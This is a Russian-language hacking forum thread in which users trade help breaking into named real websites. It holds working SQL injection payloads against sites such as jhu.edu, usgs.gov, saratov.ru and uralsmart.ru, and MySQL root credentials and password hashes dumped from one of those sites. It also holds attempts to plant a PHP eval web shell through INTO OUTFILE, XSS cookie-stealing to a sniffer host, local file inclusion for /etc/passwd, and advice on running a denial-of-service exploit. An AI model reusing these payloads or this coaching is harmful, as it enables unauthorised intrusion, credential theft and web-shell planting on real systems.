В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).

Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.

Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется

Расскажите про вот такую штуку.
http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES)
Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь.

Это ColdFusion
права у твоей небольшие - нет прав на системные таблицы. это видим из
http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8 ,9,10,11,12,13+from+MSysObjects

подбирай кол-во столбцов
http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ...
Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым)
либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе
http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос

приветствую!

столкнулся с такой проблемой (

http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/*

Error Number: 1242
Error Message: Subquery returns more than 1 row

а в случае

1=if(ascii(substring((select user()),1,1))>=100,1,0)

все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать )

права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает...
------------------------------------------------------------------
и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает.....

http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2

если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt....

Error Number: 1064
Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2

уже и так писал и сяк, не получается с этим серваком (((


версия 5.0.22

с уважением,

Error Number: 1242
Error Message: Subquery returns more than 1 row
переведи
юзай лимит
хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер.

по поводу второго:

<?php eval($_GET[http://server.com/cmd.php]) ?>

это должно быть в кавычках

http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*

Если я не ошибаюсь, то загрузка файла через sql происходит путем ... union+select+1,2,3,что будем загружать,5,6..+from+существующ ая таблица+into+outfile+'/полный/путь/до/директории/для/записи/123.php'/*

Т.е. вы посто забыли поставить кавычки за прописать полный путь.

спасибо за советы,

1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть....

2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего.....

www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/*

пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ?

благодарю....

кавычки фильтруются жестко
При записи +from+table+into+outfile+'/путь/к/папке/для/записи/123.php'/* нужны реальные кавычки, char() здесь не поможет, при фильтрации кавычек эта схема невозможна.

подскажите как правильно запрос написать с лимитом....
select password from mysql.user where user=char(114,111,111,116) limit 0,1
Вот это ты имел ввиду?

http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/*

Error Number: 1242
Error Message: Subquery returns more than 1 row

Конечно может я не прав но первая мысль у меня возникла что в этой таблице два юзера "root"... Интересно это возможно или нет...

там как не странно но два пользователя с 2-мя одинаковыми пассами....

limit помог, пасс соответственно как я и писал выше....

root:3553f4a3048036eb
touchandgo:3553f4a3048036eb

http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(), char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7, 8/--

------

именно ' там фильтруются, у меня не получилось шелл залить(

благодарю за помощь, отдельное спасибо I-I()/Ib - за статью..... )

Работа с MySQL версии 5.0.27.
Делаю такой запрос -4+union+select+1111,TABLE_NAME,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+limit+5, 1/*.html
Все работает. Как я понимаю выводит название одной из таблиц которые есть в базе.
Нахожу нужную таблицу через лимит.
Составляю запрос
-4+union+select+1111,COLUMN_NAME,3333,4444,5555,666 6,7777,8888+from+information_schema.COLUMNS+WHERE+ TABLE_NAME='wifi_points'/*.html
Где 'wifi_points'имя таблицы полученое из предидущего запроса.
Выводиться имя столбика - "id"
Дальше пытаюсь вытянуть данные таким запросом
-4+union+select+1111,id,3333,4444,5555,6666,7777,88 88+from+wifi_points/*.html
выдает пустоту так как будто запрос неверный. Пробовал подставлять лимит 1,1 и 0,1 нифига.
Пробую -4+union+select+1111,2222,3333,4444,5555,6666,7777, 8888+from+wifi_points/*.html
Т.е. проверяю есть ли такая таблица - тоже пусто.
В итоге могу узнать полностью структуру базы но данные не могу вывести.
Что не так? Может есть хитрости при работе с MySQL версии 5.0.27.
Как правильно строить запрос ведь скуль есть, а результата нет?

Значит твоему пользователю закрыт доступ, такое тногда бывает, через системные таблицы видишь, а вывести не можешь((((

Возможно эта таблица находится в другой базе, можно посмотреть запросом
1,2,schema_name,4+from+infotmation_schema.schemata/*
Выведет все существующие базы

и если не ошибаюсь можно выдернуть интересную связку

schema_name,table_name,column_name+from+informatio n_schema.columns/*

Я уверен что в таблице columns есть column_name и table_name, но насчет schema_name не уверен, но по-моему она там была.

Попробуй
-4+union+select+1111,table _schema,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+where+ta ble_name='wifi_points'/*.html

Здравствуйте, мне нужна ваша помощь.
На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку.
Я отправляю
?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTF ILE+'name'
(OUTFILE я пишу одним словом, без пробела Ж)
Выдает такое
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7

Warning: mssql_query() [function.mssql-query]: Query failed in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7

Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in E:\XAMPPLITE\htdocs\info\pages\map.php on line 8

А если запрос такой
?id=1122+UNION+SELECT+1,2+FROM+locations
всё нормально, без ошибок

PHP скрипт там такой
$result = mssql_query("SELECT *
FROM locations
WHERE id = $id;");
Со скриптом возможна неточность (врядли), тк на сервере стоит немного другая версия.

Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться

ээм, а может быть в MSSQL немнога другие запросы поэтому и в into возникает неправильный синтаксис... Все же я не уверен, это всего лишь предположение, за неправильность не бить =)

http://e-catalog.rusbiz.ru/1'+and+'1'='1.html

В чем косяк? Запрос вроде правильный, но не проходит. Подозреваю, глюк с плюсами... пробовал /**/, не канает :)

Не знаю правильно ли я выбрал раздел.
Народ вот есть эксплоит
MS Windows Explorer.exe Gif Image Denial of Service Exploit
http://www.milw0rm.com/exploits/4215
Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.

вот попробовал вбить такое http://www.olympic.org/uk/news/olympic_news/full_story_uk.asp?id=2272' и выдает как видно ошибку ....
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cint'

/common/asp/inc_news.asp, line 634

хотя сами могли увидеть.... так вот... что мона сделать дальше?? )) или еще конкретней как заюзать все это... что применить?? ) заранее благодарю... )

Не знаю правильно ли я выбрал раздел.
Народ вот есть эксплоит
MS Windows Explorer.exe Gif Image Denial of Service Exploit
http://www.milw0rm.com/exploits/4215
Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.

Перл-сплоиты не компилируются, а интерпретируются (выполняются)
Установи Active Perl (use g00gle 4 searching)
Далее...
1. если сплоит с ГУИ (с графич. интерфейс), просто кликни по нему пару раз
2. если сплоит консольный, запускаешь cmd.exe, переходишь в каталог со сплоитом и запускаешь его, предварительно прочитав в хелпе, за что какой аргумент отвечает.

пс: данная тема не раз обсуждалась, если все еще непонятно - юзай поиск.

Вобще этот сплоит создает картинку Art.gif которая при ее загрузке вызывает DOS но этот сплоит немного исправить надо (под винду)

а в целом действуй так, как посоветовал n1†R0x, только вот по идее когда ты сам картинку будешь смотреть у тебя винда уйдет в аут...

вопрос: зачем он тебе нужен? :)

нашел количество полей - пытаюсь вывести бд ругается.......
http://www.suvd.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

x.Elf делай через подзапросы

там 3 версия мускула, а внем union select не работает...

http://www.suvd.ru/news.php?id=4825%20and%20ascii(lower(substring(Ver sion(),1,1)))=51/*

ascii("3")=51

тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,3/*
юзай "-1+ORDER+BY+.../*" помогает...

то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??

тут сайтец с скуль уязвимостью...

http://www.mediacomp.ru/?action=sub_kat&top_kat=-1,union+select+1/*

самое ссмешное то что я подобрал до 72 и нифига ничего не вылезло.... что предложите сделать ....?
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,3/*
http://www.mediacomp.ru/?action=sub_kat&top_kat=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version (),0x71),0x71)/*

то есть ты хочешь сказать что истина полюбе есть, тока находится далеко и мою работу облегчит данная фича?? или как??
http://forum.antichat.ru/thread19605-mysql+inj.html

сначало прочти, а потом и вопросы...
не тупи...

заюзай AND

вторая ссылка не пашет , до первой странно, почему я ее пропустил ппц. я даже удивился ))) но повторюсь вторая ссылка полюбе версию не показывает...

заюзай AND
Он вобще что такое mysql inj не хорошо понимает...

http://forum.antichat.ru/thread19605-mysql+inj.html

сначало прочти, а потом и вопросы...
не тупи...
сор))

вторая ссылка не пашет , до первой странно, почему я ее пропустил ппц. я даже удивился ))) но повторюсь вторая ссылка полюбе версию не показывает...
Балбес - вторая пашет просто там пробел между скобками и version (в переносах возникают пробелы при посте)

понятно ,
P.s. тока не груби

понятно ,
P.s. тока не груби
Ты просто минимум не понимаешь ... даже такие мелочи
как было сказано выше - это просто уже выносит на грубость...

ясно что предложишь??

http://www.usgs.gov/newsroom/article.asp?ID=1'
Помогите провести инъект на сайте.
У меня с MSSQL пока туговато...

http://ts.edu.ru/schools/region/4/?town=%C4'
и здесь...

uralsmart.ru
Опять таки mssql.
Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа:
' or 'a'='a
" or 1=1--
or 1=1--
а тока ругается -ХЕЛП

http://ts.edu.ru/schools/region/4/?town=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORM ATION_SCHEMA.TABLES)--а вобще читай здесь http://forum.antichat.ru/thread30501.html отлично написано

http://ts.edu.ru/schools/region/4/?town=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORM ATION_SCHEMA.TABLES)--а вобще читай здесь http://forum.antichat.ru/thread30501.html отлично написано
спс :) я просто редко с мсскл сталкивась :)

http://www.usgs.gov/
уже фильтрацию поставили гады ((
тока два дня назад нашел ((

нашел сайтец при www.site.ru/id=1' при отправке такого запроса он мен выдает вот это

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "'"]'

/support/includes/inc_news.asp, line 82

я понял что это mssql но возможно ли тут инъекция, очень сложный вопрос так как я попробовал узнаь версию он мне выдал вот что
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "@@version--"]'

/support/includes/inc_news.asp, line 82


я попробовал множество вариантов , прочитал статьи и нашел что базы данных
Vbscript впринципе невозможно взломать,... но надежда умирает последней может вы что то можете предложить... спасибо
саму ссылку пока не даю так как , разъяснить надо поподробнее если уже идей не будет дам и ссылку... спасибо заранее

Объясните ламеру возможно ли это как-то использовать в своих целях? :)

http://forums.saratov.ru/index.php?act=members&st=%20-1
и
http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php

я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь...
а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..

Taylorith там строка задается. ничего не сделаешь

Раскручивай лучше отсюда http://saratov.ru/ads/click.cgi?account='

Вот что я нашел по Саратову
http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/*
Таблицы не подобрал... :( пробовал mysql.user и ibf_members может руки не оттуда?..

http://www.saratov.ru/gallery/?show=gal&id=-1+union+select+1,2,выводится,4,5,6/*

saratov
gallery@localhost
4.0.17

http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((

http://www.law.edu.ru/matlist.asp?themRub=20'&docType=11
что можно сделать?

.php?rid=-1+union+select+1,2,3,column_name,5,6,7,8,9,1,2+fro m+information_schema.columns+where+table_name='use rs'+limit+1,1/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' limit 1,1/*' at line 5
Он ' фильтрует? Таблица users 100% существует.

http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((
http://www.edu.ru/index.php?page_id=50&op=word&wid=581 and substring(version(),1,1)=4
там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут

http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name='

ни фига ниче не получается сделать пробовал найти количество столбоц , очень странно все короче... посомтрите пожлауйста... в че же я ошибаюсь


ну к примеру делаю запрос такой
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=1'+union+select+1/*
он мне выводит вот это

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1/*' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/vhosts/turclubmai.ru/html/heading/index.txt on line 46

странно неправда ли , я короче таким образом дошел до 70 ...)) ни фига ничего а order by даже на 200 писал ошибку и даже на 1 ... не знаю короче помогите..

Taylorith
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,version()+/*

5.0.24-standard
db_turclubmai
turclubmai@localhost

мля черт .... спасибо чел ) вот дурак не замтеил))

Он ' фильтрует? Таблица users 100% существует.

Да, попробуй char() использовать, должно получиться.

Хотел бы узнать если можно что то сделать с данной ошибкой,которую получаю на сайте,после добавки '

http://www.bezeqint.net/PageText.aspx?cc=010202020311'

Да, попробуй char() использовать, должно получиться.
Таблица была в другой базе, br помог, за что ему спасибо. :)

прива вот покопался в одном сайте
адрес вот такого типа http://www.site.ru/document.php?id=25609'&topic=тут топик естесно )

потсавил ковычку и высветилось вот это


Warning: fopen(/usr/data/www2.nalog.ru/htdocs/mw/root//secure.log) [function.fopen]: failed to open stream: Permission denied in /usr/data/www2.nalog.ru/htdocs/mw/libs/frontend_queries.php on line 15


я знаком тока сос кулем... помогите заюзщать данную ошибку мне незнакомую...лучше скажите что это конкретно означает , к каким видам уязвимости относится и можно ли что нить сделать.....

если идей больше не будет скажите скину сайт в ПМ.

А не страшно nalog.ru ломать? )
ФНС РФ как никак )

и посмотри на что он ругается: secure.log
Если бы не ругался он, то тебя записали бы и потом пришли в гости. А так просто прав нет на запись и все

я дурак )) не стер в сайт в ошибке ))) вот ламер то ))....

P.s. сокс 5 стоит... врятли бы свычислили ))...

я понимаю что все-таки есть риск , но просто выдалась ошщибка , я то ясное дело не буду дальше углублятся потому что не дурак понимаю что могут вычислить...

ну если рассматривать все-таки данную ошгибку что мона из нее полезное извлечь предположим эот не сайт федеральной налогой слуджбы а другой.... что мона применить?? просто для интереса ...

У меня такой вопрос.
Как заставить вот это работать

http://site.ru/sniffer/lol.jpg"+javascript:document.cookie;

Когда я посылаю сообщение на сайте,то фотку не видно,REFERER работает а вот document.cookie нет поскольку не правельно изложено. Пытался по разному,и так тоже

http://site.ru/sniffer/lol.jpg"+javascript:alert(document.cookie);

но без изменений,кукис не достаёт падла.

html отключён там,прочерк тоже не канает там.

что посоветуете ?

Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда

Nazaret2005
<script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script>
?

Basurman - Я же написал,что html и прочерки не возможны... По этому не получается...

P.S

вот так у него построино.
function comment($text, $strip_html = true) {
$s = $text;
$s = str_replace(";)", ":wink:", $s);
if ($strip_html)
$s = htmlspecialchars_uni($s);
$bb[] = "#\[img\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#i";
$html[] = "<img class=\"linked-image\" src=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
$bb[] = "#\[img=([a-zA-Z]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
$bb[] = "#\[img\ alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
$bb[] = "#\[img=([a-zA-Z]+) alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\3\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
$s = preg_replace($bb, $html, $s);
return $s;
}

ну а это выводит результат
" . comment($member["info"]) . "

Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда

я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.

вот нашел я локальний инклуд http://www.polarion.org/index.php?page=
и чегото никак не получается прочитать etc/passwd
Как ето там реализировать )

Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?

все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
первым делом делаешь следующее
http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
http://mir-tech.ru/group.php?cat=-1+union+select+1/*
вот выдал тебе единичку )) далее чстобы узнать версию

http://mir-tech.ru/group.php?cat=-1+union+select+version()/*

5.0.41-log )) вот она легко ломается ))
если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
)) а так можешь потсучаться в асю 896353 )


http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema. tables+limit+3,1/*
таким образом перебираешь таблицы ))
вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )

Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте?
Спасибо.

попробуй изменить метод отправки формы на get.
если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
<form method=post action=http://example.com/ id=form1 >
<input name=search value='"><script>alert()</script>'/>
</form>
<script for=form1 event=load >form1.submit()</script>

где action для формы и name для input ввозьмешь с уязвимого сайта.

У меня вопрос по MSSQL
Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3
Выводит
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Тоесть он показывает ошибку!
Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?

Почитай статью КЕША.
http://forum.antichat.ru/showthread.php?t=30501
Там без юнион. Мне очень помогла статья, многие скули удалось провести.

Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
Извените за оффтоп, но не удержался!

Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
на нем есть mssql injection:
http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHE MA.tables)--
провожу я - узнал все таблы:
'aSellers','aResponsiblePersons',
'eAuth_Groups',%20'eAuth_Groups_Members',
%20'eNotify_Log','ePage_Trans','eRoles',%20
'eRoles_Functions','syssegments','eRoles_Objects
','sysconstraints','aBlanks','aTariffs_Ethernet','
aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk ',
%20'aSharpdesignPortfolio','aTariffs_IPtel_World',
'xSearch_Pages','xSearch_Triads','xSearch_Words',
%20'eAuth','ePage','aTariffs_Dialup','vmNews','
dtproperties',%20'aHotLinks','zForms_Fields','
aSellers_Groups',%20'zForms_Forms','MainMenu','
votes','votes_answers','aHotImgs','mNews',%20
'Results','vAuth','vAuth_Active_NT','
vAuth_Active_Post','mWishBook_Groups',
'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
'aConnectZones','aSellers_Districts','mNews_Mailli st'
то что я нашел...(колумны я не стал писать) - но вот есть трабл:
Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
Вот проблема: колумн name я вывожу - се окей а вот
дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
Там еще много таблиц с колумноми pwd и все они выбрасыват....Help

есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?

На сайте под управлением joomla есть уязвимость
http://site.com/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*

Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?

Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"

На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только

есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
Хех... попробуй ' or 'a'='a' LIMIT 0,1 /* затем ' or 'a'='a' LIMIT 1,1 /* пока не найдещь того юзера который тебе нужен...

Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!

Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!
Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать...
Так что все...

Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!

для начала попробуй так:1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--

но скорее всего так:1+or+1=(SELECT+TOP+1+convert(int,PassHash%2 b'%20qwerty')+from+admin)--

в таком случае твой хеш это то что будет идти до qwerty

1)у меня нет аккаунта на сайте

2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.

перед qwerty ничего...

1. да причем здесь твой аккаунт имелось ввиду логин который ты получил через скулю...
2. тогда так попробуй (и чтоб вопросов не возникло смотри п.1):1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b '%20qw erty')+from+admin where Login='логин который ты получил')--

хотя точно тебе никто нескажет... остается угадывать, вот если б ты линк дал со скулей, тогда бы помогли скорее всего

значит первое значение passhash пустое... пробуй следующий логин...

ЗЫ кстати тут convert() наверное не нужен
ЗЗЫ Еслиб линк бы сразу дал, меньше бы флуда было
ЗЗЗЫ Или в асю мне стучи... посмотрим че там...

Доброго дня)
Возникла проблема с заливкой шела в движке Insart.Content
Имеется полный доступ к админке, есть возможность загрузки любых файлов, в том числе и *.php. Но, система отказывается выполнять код, а просто выводит его на экран => не полчается запустить шелл.
Двиг на asp. Ссылку на загруженный шел формирует вида: getfile.asp?id={3AC9A519-4730-4C84-81AB-8A59A69A3F0C}
Какие могут быть пути решения данной проблемы?

1)у меня нет аккаунта на сайте

2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.

перед qwerty ничего...

1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--

Он имел виду логин который ты сам смог нарыть,администратора или ещё кого... ;)

У меня вопрос таков...
На кое каком движке я обнаружел что ббтэг не соовсем написан правельно,и поэтому можно что то намутить.
Поскольку я не спец,то решил посоветоватся тут.

тэг тут ссылка на файл

возможно ставить любую ссылку,тоесть без начало http:// и без конца .mp3 .
К примеру
http://address.com/shell.php?hack=now

в результате в коде сайта это выглядит так

<embed autostart="false" loop="false" controller="true" width="220" height="42" src=http://address.com/shell.php?hack=http://address.com/shell.php?hack=now></embed>

Ну а теперь вопрос,что можно с этим сделать ?

P.S: все различные ковычки ( ' " < >) он фильтрует. но можно обойти ещё и через flash файлы. работает а так же ббтэг ссылка .

Где можно достать гид по созданию flash атаки,что бы работал с javascript .

Query failed: Table 'mobolan.config' doesn't exist

оно само прописует mobolan, таблица конфиг точно есть!!!

на запрос логина админа сервер выдал мне:

4Ruket&ebUSPaPhAf#stUchUthE4EBU+AVEq_dravEbREk$Zud#trat$u s?EcaqE

а на пароль:

az#NAf7A!uw9e&h#cHANej_pr*hupr-yaChe@$u!uthUthesabatRuQEq+4r&crU&

Первый раз с этим столкнулся, вопрос, что ЭТО?

Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?

Буду оч признателен за подсказку.

Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
